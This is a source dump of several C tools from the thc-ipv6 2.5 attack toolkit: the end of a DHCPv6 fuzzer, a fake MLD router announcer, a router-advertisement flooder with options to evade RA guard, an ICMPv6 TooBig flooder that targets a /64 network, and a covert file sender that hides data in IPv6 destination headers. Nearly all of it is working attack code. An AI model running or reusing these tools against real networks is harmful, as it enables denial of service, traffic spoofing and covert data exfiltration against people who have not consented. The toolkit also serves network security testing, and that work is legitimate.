strlen(fuzzbuf), fuzzbuf); //Make sure we don't add dns twice done_dns = 1; } data += olen + 4; len -= olen + 4; if (len < 0) { printf("Information: evil packet received\n"); len = -1; } } } //Add saved dns option onto this packet if (do_dns && !done_dns) { memcpy(mybuf + mlen, dns_option_hdr, dns_option_hdr_len); mlen += dns_option_hdr_len; //Append dns fuzzing olen = dns_option_hdr[2] * 256 + dns_option_hdr[3]; strcat(fuzzbuf, fuzztype_FQDN); for (i = 0; i < olen - 1; ++i) strcat(fuzzbuf, "B"); //Fuzz the domain name string strcat(fuzzbuf, fuzztype_option_request); // printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); } //Build and send fuzzed message packets if (len >= 0) { unsigned char* dst = thc_resolve6("ff02::1:2"); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ptr + 38, dst, 1, 0, 0, 0, 0)) == NULL) { fprintf(stderr, "Error: Couldn't create dhcp requests ipv6 header\n"); exit(-1); } if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0) { fprintf(stderr, "Error: Couldn't create dhcp requests udp header\n"); exit(-1); } if (thc_generate_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Couldn't create dhcp requests ethernet header\n"); exit(-1); } if (fuzz_loop(pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Fuzzing request packet failed\n"); exit(-1); } else { got_packet = 1; //Used to suppress timeout error } pkt = thc_destroy_packet(pkt); } //Truncate the fuzz buffer back to it's original length fuzzbuf[66] = 0; // printf("Trunc fuzzbuf: %s\n", fuzzbuf); } int main(int argc, char *argv[]) { char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL; // defines mac as 6 pieces and defines pkt as null. char wdatabuf[1024]; //builds data buffer and sets memory size at 1024mb unsigned char *mac6 = mac, *src, *dst; //creates mac6 address usuing int i, s, len, pkt_len = 0, dlen = 0; int do_all = 1, use_real_mac = 1, use_real_link = 1; int state; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); //Parse options while ((i = getopt(argc, argv, "123456789mn:t:e:T:dFp:fr")) >= 0) { switch (i) { case '1': do_type = DO_SOL; break; case '2': do_type = DO_REQ; break; case '3': do_type = DO_CON; break; case '4': do_type = DO_REN; break; case '5': do_type = DO_REB; break; case '6': do_type = DO_REL; break; case '7': do_type = DO_DEC; break; case '8': do_type = DO_INF; break; case 'm': fuzz_msg_type = 1; break; case 'n': no_send = atoi(optarg); break; case 't': test_start = atoi(optarg); break; case 'e': test_end = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'F': use_real_link = 0; // no break case 'f': use_real_mac = 0; break; case 'p': ping = atoi(optarg); break; case 'd': do_dns = 1; case 'r': i = 0; break; // just to ignore -r default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } //Check options if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (test_end < test_start) { printf("dont fuck up the command line options!\n"); exit(-1); } memset(mac, 0, sizeof(mac)); interface = argv[optind]; dns_name = argv[optind + 1]; if (use_real_link) src = thc_get_own_ipv6(interface, NULL, PREFER_LINK); else src = thc_resolve6("fe80::"); if (use_real_mac) { mac6 = thc_get_own_mac(interface); memcpy(mac, mac6, sizeof(mac)); } dst = thc_resolve6("ff02::1:2"); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); // only to prevent our system to send icmp port unreachable messages if ((s = thc_bind_udp_port(546)) < 0) fprintf(stderr, "Warning: could not bind to 546/udp\n"); if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) { fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface); exit(-1); } //Establish state if (do_type == DO_SOL || do_type == DO_REB) state = STATELESS; else state = STATEFULL; // generate full fuzz mask for stateless types and partial for statefull types strcpy(fuzzbuf, fuzztype_ether); strcat(fuzzbuf, fuzztype_ip6); strcat(fuzzbuf, fuzztype_udp); if (fuzz_msg_type) strcat(fuzzbuf, fuzztype_dhcp6); else strcat(fuzzbuf, fuzztype_dhcp6no); if (state == STATELESS) { strcat(fuzzbuf, fuzztype_elapsed_time); strcat(fuzzbuf, fuzztype_client_identifier); strcat(fuzzbuf, fuzztype_IA_NA); if (do_dns) strcat(fuzzbuf, fuzztype_FQDN); } /** Generate packet **/ len = sizeof(solicit); memcpy(wdatabuf, solicit, len); //Add dns option if (do_dns) { memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate1, sizeof(dnsupdate1)); dlen = len + 8; len += sizeof(dnsupdate1); dns_option_hdr_len += sizeof(dnsupdate1); //Append domain string prefix fuzz mask if (state == STATELESS) { //<-- Do fuzzbuffer later for (i = 0; i < 7; ++i) //7 == Length of hard coded domain prefix strcat(fuzzbuf, "B"); } if (dns_name != NULL && strlen(dns_name) < 240) { if (dns_name[0] != '.') { wdatabuf[len] = '.'; wdatabuf[dlen - 5]++; wdatabuf[dlen - 3]++; len++; } memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1); memcpy(dns_option_hdr + dns_option_hdr_len, dns_name, strlen(dns_name) + 1); wdatabuf[dlen - 5] += strlen(dns_name) + 1; wdatabuf[dlen - 3] += strlen(dns_name) + 1; len += strlen(dns_name) + 1; dns_option_hdr_len += strlen(dns_name) + 1; //Append variable length domain string suffix fuzz mask if (state == STATELESS) { for (i = 0; i < strlen(dns_name) + 1; ++i) strcat(fuzzbuf, "B"); } } memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2)); memcpy(dns_option_hdr + dns_option_hdr_len, dnsupdate2, sizeof(dnsupdate2)); len += sizeof(dnsupdate2); dns_option_hdr_len += sizeof(dnsupdate2); //Append option request (FQDN request) fuzz mask if (state == STATELESS){ strcat(fuzzbuf, fuzztype_option_request); } } //Set message type if (state == STATELESS) { switch (do_type) { case DO_SOL: wdatabuf[0] = 0x01; break; case DO_REB: wdatabuf[0] = 0x06; break; default: break; } } //random src mac if (!use_real_link) for (i = 0; i < 8; i++) src[i + 8] = rand() % 256; // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand for (i = 0; i < 3; i++) { wdatabuf[i + 1] = rand() % 256; wdatabuf[i + 18] = rand() % 256; wdatabuf[i + 32] = rand() % 256; if (!use_real_mac) { mac[i * 2] = rand() % 256; mac[i * 2 + 1] = rand() % 256; } if (do_dns) wdatabuf[i + dlen] = 'a' + rand() % 26; } memcpy(wdatabuf + 22, mac, 6); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0) return -1; if (thc_generate_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0) return -1; //Fuzz solicit packet if (state == STATELESS) { if (fuzz_loop(pkt, &pkt_len) < 0) return -1; } //Fuzz request, confirm or renew paket else if (state == STATEFULL) { //Send a dhcp solicit to discover dhcpv6 servers if (thc_send_pkt(interface, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Failed to send initial solicit packet\n"); return -1; } usleep(75); //<-- I don't really know why this is neccessary but it seems to be //Construct and fuzz packets using server identifier got_packet = 0; time_t start_time = time(NULL); while(time(NULL) - start_time < timeout) { while (thc_pcap_check(p, (char *) construct_from_adv_and_fuzz, NULL) > 0); //got_packet set in callback function if (got_packet) break; } if (!got_packet) fprintf(stderr, "Timeout: Didn't receive solicited advertisement packet within timeout. Is server down?\n"); } pkt = thc_destroy_packet(pkt); // printf("fuzzbuf: %s\n", fuzzbuf); return 0; } thc-ipv6-2.5/fake_mldrouter6.c0000644000000000000000000000764312251022435014761 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int rawmode = 0; int empty = 0; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-l] interface advertise|solicitate|terminate [own-ip [own-mac-address]]\n\n", prg); printf("Announce, delete or soliciated MLD router - sourself or others.\n"); printf("Use -l to loop and send (in 5s intervals) until Control-C is pressed.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ptr = (unsigned char *) data; int len = header->caplen; if (rawmode == 0) { if (do_hdr_size) { ptr += do_hdr_size; len -= do_hdr_size; if ((ptr[0] & 240) != 0x60) return; } else { ptr += 14; len -= 14; } } if (debug) thc_dump_data(ptr, len, "Received Packet"); if (len > 43 && ptr[6] == 0x3a && ptr[40] == ICMP6_MLD_ROUTERADV) printf("MLD router advertisement: %s is performing MLD routing\n", thc_ipv62notation(ptr + 8)); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[4]; unsigned char *dst6 = thc_resolve6("ff02:0:0:0:0:0:0:6a"), *src6 = NULL, srcmac[16] = "", *mac = srcmac; int pkt1_len = 0; char *interface, string[64] = "icmp6"; int ttl = 1, mode = 0, wait1 = 0, wait2 = 0, loop = 0; pcap_t *p; memset(buf, 0, sizeof(buf)); if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-l") == 0) { loop = 1; argv++; argc--; } if (argc > 1 && argv[0] != NULL && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); interface = argv[1]; if (strncasecmp(argv[2], "sol", 3) == 0 || strncasecmp(argv[2], "que", 3) == 0) mode = ICMP6_MLD_ROUTERSOL; if (strncasecmp(argv[2], "ad", 2) == 0) { mode = ICMP6_MLD_ROUTERADV; wait1 = 15; wait2 = 0x00300006; } if (strncasecmp(argv[2], "ter", 3) == 0 || strncasecmp(argv[2], "del", 3) == 0) mode = ICMP6_MLD_ROUTERTERMINATION; if (mode == 0) { fprintf(stderr, "Error: no mode defined, specify solitate, advertise or terminate\n"); exit(-1); } if (argc < 4 || argv[3] == NULL || argv[3][0] == 0) src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK); else src6 = thc_resolve6(argv[3]); if (argc == 5 && argv[4] != NULL && argv[4][0] != 0) sscanf(argv[4], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, src6, dst6, ttl, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt1, &pkt1_len, mode, wait1 % 256, wait2, (unsigned char *) &buf, 0, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending packet%s to %s%s\n", loop ? "s" : "", argv[2], loop ? " (Press Control-C to end)" : ""); do { thc_send_pkt(interface, pkt1, &pkt1_len); sleep(5); if (mode == ICMP6_MLD_ROUTERSOL) while (thc_pcap_check(p, (char *) check_packets, NULL)); } while (loop); return 0; // never reached } thc-ipv6-2.5/flood_router26.c0000644000000000000000000001725512251022437014545 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] [-sSG] [-RPA] interface [target]\n\n", prg); printf("Flood the local network with router advertisements.\n"); printf("Each packet contains ~25 prefix and route enries\n"); printf("Modes:\n"); printf(" default sends both routing entries and prefix information\n"); printf(" -R does only send routing entries, no prefix information\n"); printf(" -P does only send prefix information, no routing entries\n"); printf(" -A an attack to disable privacy extensions\n"); printf("Options:\n"); printf(" -H add a hopbyhop header to bypass RA guard security\n"); printf(" -F add an atomic fragment header to bypass RA guard security\n"); printf(" -D add a large destination header to bypass RA guard security\n"); printf(" -s use small lifetimes, resulting in a more devasting impact\n"); printf(" -S performs a slow start, which can increases the impact\n"); printf(" -G gigantic packet of 64kb of prefix/route entries\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char *buf, buf2[6], buf3[1504]; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst); int size, mtu, i, j, k, type = NXT_ICMP6, route_only = 0, prefix_only = 0, offset = 14; unsigned char *pkt = NULL; int pkt_len = 0, rawmode = 0, count = 0, deanon = 0, do_hop = 0, do_frag = 0, do_dst = 0, bsize = -1; int cnt, until = 0, lifetime = 0x00ff0100, mfoo, slow = 0; thc_ipv6_hdr *hdr = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "DFHRPArsSG")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 's': lifetime = 0x03000000; break; case 'S': slow = 16; break; case 'G': bsize = 65488; break; case 'A': deanon = 1; prefix_only = 1; cnt = 5; until = 256; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 'R': route_only = 1; break; case 'P': prefix_only = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (prefix_only && route_only) { fprintf(stderr, "Error: -P/-A and -R can not be specified together!\n"); exit(-1); } if (bsize == -1) { bsize = thc_get_mtu(argv[optind]) - 40; if (bsize < 1240 || bsize > 1460) { fprintf(stderr, "Error: invalid MTU on interface %s: %d\n", argv[optind], thc_get_mtu(argv[optind])); exit(-1); } } if (argc - optind > 1) if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]); exit(-1); } if ((buf = malloc(bsize)) == NULL) { fprintf(stderr, "Error: malloc() failed\n"); exit(-1); } if (deanon == 0) { i = 0; if (prefix_only == 0) i += 24; if (route_only == 0) i += 32; //printf("i %d route %d prefix %d\n", i, prefix_only, route_only); cnt = (bsize - 32 - (do_hop + do_dst + do_frag) * 8) / i; } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } mtu = 1500; size = 64; k = rand(); ip6 = malloc(16); memset(ip6, 0, 16); ip6[0] = 254; ip6[1] = 128; ip6[9] = ( k % 65536) / 256; ip6[10] = k % 256; ip6[15] = 1; k++; if (do_hdr_size) offset = do_hdr_size; memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); memset(buf, 0, bsize); buf[1] = 250; buf[5] = 30; buf[8] = 5; // mtu buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; buf[16] = 1; // mac buf[17] = 1; // 18-23 = mac address buf[19] = 12; j = 24; if (route_only == 0) { for (i = 0; i < cnt; i++) { // prefix buf[j] = 3; // prefix buf[j+1] = 4; buf[j+2] = size; buf[j+3] = 128 + 64 + 32; memcpy(buf + j + 4, (char*) &lifetime + _TAKE4, 4); memcpy(buf + j + 8, (char*) &lifetime + _TAKE4, 4); // buf[j+5] = 2; // buf[j+9] = 1; // memset(&buf[j+16], 255, 8); if (deanon) { buf[j+16] = 0xfd; buf[j+17] = 0x00; } else { buf[j+16] = 0x20; buf[j+17] = 0x12; } buf[j+18] = (k % 65536) / 256; buf[j+19] = k % 256; j += 32; k++; } } if (prefix_only == 0) { for (i = 0; i < cnt; i++) { // route buf[j] = 24; buf[j+1] = 3; buf[j+2] = size; buf[j+3] = 8; memcpy(buf + j + 4, (char*) &lifetime + _TAKE4, 4); // buf[j+5] = 1; // 4-7 lifetime // memset(&buf[j+8], 255, 8); buf[j+8] = 32; buf[j+9] = 4; buf[j+10] = k / 256; buf[j+11] = k % 256; j += 24; k++; } } //printf("DBG: %d entries of %s %s\n", cnt, route_only == 0 ? "prefix" : "", prefix_only == 0 ? "route" : ""); //printf("j is %d, bsize %d\n", j, bsize); printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (until != 1) { memcpy(&buf[20], (char*)&k + _TAKE4, 4); memcpy(ip6 + 11, (char*)&k + _TAKE4, 4); k++; for (i = 0; i < cnt; i++) { if (route_only == 0) memcpy(&buf[24 + 20 + i*32], (char*)&k + _TAKE4, 4); k++; if (prefix_only == 0) { if (route_only == 0) memcpy(&buf[24 + 12 + i*24 + cnt*32], (char*)&k + _TAKE4, 4); else memcpy(&buf[24 + 12 + i*24], (char*)&k + _TAKE4, 4); } k++; } count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i < do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, count + i) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (lifetime != 0x03000000) mfoo = 0xff08ffff; else mfoo = 0xff080003; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, mfoo, buf, j, 0) < 0) return -1; if (do_dst || bsize + 40 > thc_get_mtu(interface)) { thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, ip6, dst, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { printf("!"); } } pkt = thc_destroy_packet(pkt); // usleep(1); if (slow > 0) { printf("slow "); sleep(slow / 2); slow--; } if (count % 1000 == 0) printf("."); if (until > 1) until--; } if (deanon) printf("\nPrivacy extension attack done.\n"); return 0; } thc-ipv6-2.5/ndpexhaust26.c0000644000000000000000000001462312251022440014213 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-acpPTUrR] [-s sourceip6] interface target-network\n\n", prg); printf("Options:\n"); printf(" -a add a hop-by-hop header with router alert\n"); printf(" -c do not calculate the checksum to save time\n"); printf(" -p send ICMPv6 Echo Requests\n"); printf(" -P send ICMPv6 Echo Reply\n"); printf(" -T send ICMPv6 Time-to-live-exeeded\n"); printf(" -U send ICMPv6 Unreachable (no route)\n"); printf(" -r randomize the source from your /64 prefix\n"); printf(" -R randomize the source fully\n"); printf(" -s sourceip6 use this as source IPv6 address\n"); printf("\nFlood the target /64 network with ICMPv6 TooBig error messages.\n"); printf("This tool version is manyfold more effective than ndpexhaust6.\n"); exit(-1); } #define IDS_STRING 0xbebacefa int main(int argc, char *argv[]) { char *interface, *ptr, buf2[8]; unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL; int i, offset = 14, type = ICMP6_TOOBIG, alert = 0, randsrc = 0, do_crc = 1; unsigned char *pkt = NULL, ip6[8]; int pkt_len = 0, count = 0; thc_ipv6_hdr *hdr; unsigned int filler = IDS_STRING, mychecksum; unsigned char offender[] = { 0x60, 0x00, 0x00, 0x00, 0x01, 0xcd, 0x3a, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x20, 0x03, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x80, 0x00, 0xed, 0xc5, 0xfa, 0xce, 0xba, 0xbe, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 }; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "acpPTUrRs:")) >= 0) { switch(i) { case 'a': alert = 8; break; case 'c': do_crc = 0; break; case 'p': type = ICMP6_ECHOREQUEST; break; case 'P': type = ICMP6_ECHOREPLY; break; case 'T': type = ICMP6_TTLEXEED; break; case 'U': type = ICMP6_UNREACH; break; case 'r': randsrc = 8; break; case 'R': randsrc = 1; break; case 's': src = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); interface = argv[optind]; if ((ptr = index(argv[optind + 1], '/')) != NULL) *ptr = 0; if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]); exit(-1); } if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (src == NULL) if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL || (src[0] == 0xfe && src[1] == 0x80)) { fprintf(stderr, "Error: no global IPv6 address configured on interface %s\n", interface); exit(-1); } if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]); exit(-1); } for (i = 0; i < ((sizeof(offender) - 48) / 4); i++) memcpy(offender + 48 + i*4, (char*) &filler + _TAKE4, 4); memcpy(offender + 8, dst, 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (alert) { memset(buf2, 0, sizeof(buf2)); buf2[0] = 5; buf2[1] = 2; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, type, 0, 1280, offender, sizeof(offender), 0) < 0) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (do_hdr_size) offset = do_hdr_size; printf("Starting to flood target network with toobig %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 4; i < 8; i++) ip6[i] = rand() % 256; memcpy(hdr->pkt + offset + 32 + 4, ip6 + 4, 4); memcpy(hdr->pkt + offset + 40 + 8 + 8 + 8 + 4 + alert, ip6 + 4, 4); if (randsrc) { for (i = randsrc; i < 16; i++) hdr->pkt[offset + 8 + i] = rand() % 256; } if (do_crc) { hdr->pkt[offset + 42 + alert] = 0; hdr->pkt[offset + 43 + alert] = 0; mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40 + alert, pkt_len - offset - 40 - alert); hdr->pkt[offset + 42 + alert] = mychecksum / 256; hdr->pkt[offset + 43 + alert] = mychecksum % 256; } while (thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/covert_send6.c0000644000000000000000000001172712251022434014266 0ustar rootroot#include #include #include #include #ifndef _HAVE_SSL int main() { fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, covert_send6 disabled.\n"); return -1; } #else #if (_TAKE2 > 0) int main() { fprintf(stderr, "Error: tool does not work on big endian\n"); return -1; } #endif #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-m mtu] [-k key] [-s resend] interface target file [port]\n\n", prg); printf("Options:\n"); printf(" -m mtu specifies the maximum MTU (default: interface MTU, min: 1000)\n"); printf(" -k key encrypt the content with Blowfish-160\n"); printf(" -s resend send each packet RESEND number of times, default: 1\n"); printf("\n"); printf("Sends the content of FILE covertly to the target, And its POC - don't except\n"); printf("too much sophistication - its just put into the destination header.\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, rbuf[3570], wbuf[3570], buf[4000]; unsigned char *src6 = NULL, *dst6 = NULL, srcmac[6] = "", *mac = srcmac, *dmac; int pkt1_len = 0, flags = 0, i = 0, mtu = 0, bytes, seq = 0, id, rounds, wbytes, bufsize = 0, send = 2, num = 0; char *interface, *key = NULL, hash[20], vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };; int rawmode = 0, tcp_port = -1; FILE *f; BF_KEY bfkey; if (argc < 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "rm:k:s:")) >= 0) { switch (i) { case 'r': rawmode = 1; thc_ipv6_rawmode(1); break; case 'k': key = optarg; break; case 'm': mtu = atoi(optarg); break; case 's': send = atoi(optarg); break; default: exit(-1); } } if (argc < optind + 2) { fprintf(stderr, "Error: Not enough parameters!\n"); help(argv[0]); } interface = argv[optind]; dst6 = thc_resolve6(argv[optind + 1]); if ((f = fopen(argv[optind + 2], "r")) == NULL) { fprintf(stderr, "Error: file %s not found\n", argv[optind + 2]); exit(-1); } if (argc >= optind + 4 && argv[optind + 3] != NULL) tcp_port = atoi(argv[optind + 3]); if (mtu == 0) mtu = thc_get_mtu(interface); if (mtu <= 1000) { fprintf(stderr, "Error: MTU of interface %s must be at least 1000 bytes\n", interface); exit(-1); } mac = thc_get_own_mac(interface); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((dmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "Error: can not get MAC for target\n"); exit(-1); } srand(getpid()); mtu -= 128; if (mtu % 255 == 0) i = 2 * (mtu / 255); else i = 2 + 2 * (mtu / 255); mtu = mtu - i; if ((mtu + i + 14) % 8 > 0) mtu = (((mtu + i + 14) / 8) * 8) - (i + 14); if (mtu > 14 * 255) mtu = 14 * 255; if (key != NULL) { memset(&bfkey, 0, sizeof(bfkey)); SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash); BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash); memset(vec, 0, sizeof(vec)); num = 0; } id = rand(); buf[0] = 16; buf[1] = 4; memcpy(buf + 2, (char *) &id, 4); buf[6] = 17; buf[7] = 4; while ((bytes = fread(rbuf, 1, mtu, f)) > 0) { seq++; if (key != NULL) { BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_ENCRYPT); memcpy(rbuf, wbuf, bytes); } memcpy(buf + 8, (char *) &seq, 4); bufsize = 12; rounds = bytes / 255; for (i = 0; i <= rounds; i++) { buf[bufsize] = i + 18; if (i == rounds) wbytes = bytes % 255; else wbytes = 255; buf[bufsize + 1] = wbytes; memcpy(buf + bufsize + 2, rbuf + 255 * i, wbytes); bufsize += wbytes + 2; } if (bytes < mtu) { buf[bufsize] = 0x1f; buf[bufsize + 1] = 0; bufsize = bufsize + 2; } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, bufsize)) return -1; if (tcp_port == -1) { if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, NULL, 0, 0) < 0) return -1; } else { if (thc_add_tcp(pkt1, &pkt1_len, (rand() % 45536) + 10000, tcp_port, rand(), 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; } if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending packet seq# %d\n", seq); for (i = 0; i < send; i++) { thc_send_pkt(interface, pkt1, &pkt1_len); usleep(100); } } printf("All sent.\n"); return 0; } #endif 